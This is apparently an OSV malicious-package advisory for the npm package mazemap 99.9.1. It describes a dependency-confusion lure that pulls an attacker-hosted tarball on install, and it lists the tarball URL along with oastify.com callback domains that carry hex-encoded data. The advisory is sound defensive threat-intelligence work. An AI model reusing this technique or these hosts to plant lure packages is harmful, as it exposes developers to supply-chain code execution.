MAL-2026-5448

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mazemap/MAL-2026-5448.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-5448
Published
2026-06-09T17:24:06Z
Modified
2026-06-09T18:01:36.562816451Z
Summary
Malicious code in mazemap (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0)

package.json declares its only dependency ltidisafe as a direct HTTPS tarball URL (https://ltidi.storage.googleapis.com/depenconf/ltidisafe-3.0.2.tgz) hosted on a generic Google Cloud Storage bucket rather than resolved from the npm registry. On npm install mazemap, npm fetches and installs that arbitrary tarball, executing any lifecycle scripts (preinstall/install/postinstall) it contains — the tarball is bucket-owner-mutable and not subject to registry vetting. The package itself is a hollow lure: index.js is a 35-byte module.exports = {};, with no description, no author, ISC default license, and version 99.9.1 — a recognized dependency-confusion technique for overriding an internal package of the same name via a higher public version. The bucket path segment is literally depenconf. The combination of hollow main, inflated version, anonymous GCS-hosted dependency, and name collision with a real product (MazeMap) is a dependency-confusion / smuggling shape whose only on-install effect is to pull and execute attacker-controlled code from a non-registry source.

Database specific 
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-06-09T17:24:06Z",
            "versions": [
                "99.9.1"
            ],
            "sha256": "751317dcad79cec866b8dc69cd60b39e3be8e1bcc45746039835b04ce32445b0",
            "id": "IN-MAL-2026-005033",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:50.097394313Z"
        },
        {
            "modified_time": "2026-06-09T17:24:07Z",
            "versions": [
                "99.9.1"
            ],
            "sha256": "ecccd07042bcd8a96f5ad7d2cdba5ecd1b36fac689210c4bdd4575b2d9a92cb6",
            "id": "IN-MAL-2026-005034",
            "source": "amazon-inspector",
            "import_time": "2026-06-09T17:45:50.138728626Z"
        }
    ]
}
References
Credits

Affected packages

npm / mazemap

Package

Name
mazemap
View open source insights on deps.dev
Purl
pkg:npm/mazemap

Affected ranges

Affected versions

99.*
99.9.1

Database specific

indicators 
{
    "evidence_files": [
        {
            "sha256": "06e43470ff0eafc309308403464434f5afd314d40265922d8ef5de296b1c9465",
            "tlsh": "b9e0c2244a6566334ec911b64c2a655bf3b18e5f4418bc1d6bdb042c418dab338f925d",
            "path": "package.json"
        }
    ],
    "domains": [
        "ltidi.storage.googleapis.com",
        "7363616e.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
        "7363616e2d633063303364613663333833.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com",
        "2f686f6d652f7363616e.mazemap.5djpny9mibugmvyzxuakcrzv1m7d41upj.oastify.com"
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha512_sri": "sha512-M7oJSA6NNnUgXkUS1FKHFB24H3owMcoRUonZQxz8dJoSXOXRZqm0zmpTdQZlZW+VBt85JkmDUwyEZdWMuCdCTw==",
                "sha1": "d2b808b547cfbd8a923768e468f375e1a60729c3"
            },
            "filename": "mazemap-99.9.1.tgz"
        }
    ]
}
cwes 
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source 
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/mazemap/MAL-2026-5448.json"